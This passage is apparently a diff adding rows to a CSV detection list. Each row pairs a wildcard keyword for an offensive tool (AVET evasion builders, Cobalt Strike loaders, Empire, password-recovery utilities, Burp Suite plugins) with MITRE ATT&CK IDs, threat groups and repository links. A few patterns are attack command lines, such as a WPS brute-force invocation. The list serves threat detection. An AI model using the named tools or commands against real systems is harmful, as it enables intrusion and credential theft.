+"*build_c_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*build_calcfromcmd_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_calcfrompowersh_50xshikata_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_checkdomain_rc4_mimikatz.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_dkmc_downloadexecshc_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadbitsadmin_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadcertutil_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_sleep_rc4_mimikatz.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*build_svc_20xshikata_bindtcp_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*BuildBOFs.exe*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*BuildBOFs.sln*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*Building SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*BulletsPassView.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView.zip*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView_setup.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BulletsPassView_x64.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bully wlan1mon -b * -c 9 -S -F -B -v 3*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bunny.deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Burp Suite*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burp*PayloadParser.py*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" +"*burp*SQLMapper.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*burp.extension-payloadparser*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" +"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Burp_start.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*Burp_start_en.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burp2malleable.*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*burp-co2/out/artifacts*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*BurpCO2Suite.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*burpcollaborator.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BurpFunctions.java*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" +"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burplog.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*BurpShiroPassiveScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Burpsuite*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.exe*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.jar*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.sh*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*burpsuite*.zip*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BurpSuiteCn.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*BurpSuiteHTTPSmuggler*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" +"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*burp-vulners-scanner-*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*burp-xss-sql-plugin*","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" +"*buster -e * -f john -l doe -b '****1989'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*bWV0YXNwbG9pdA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 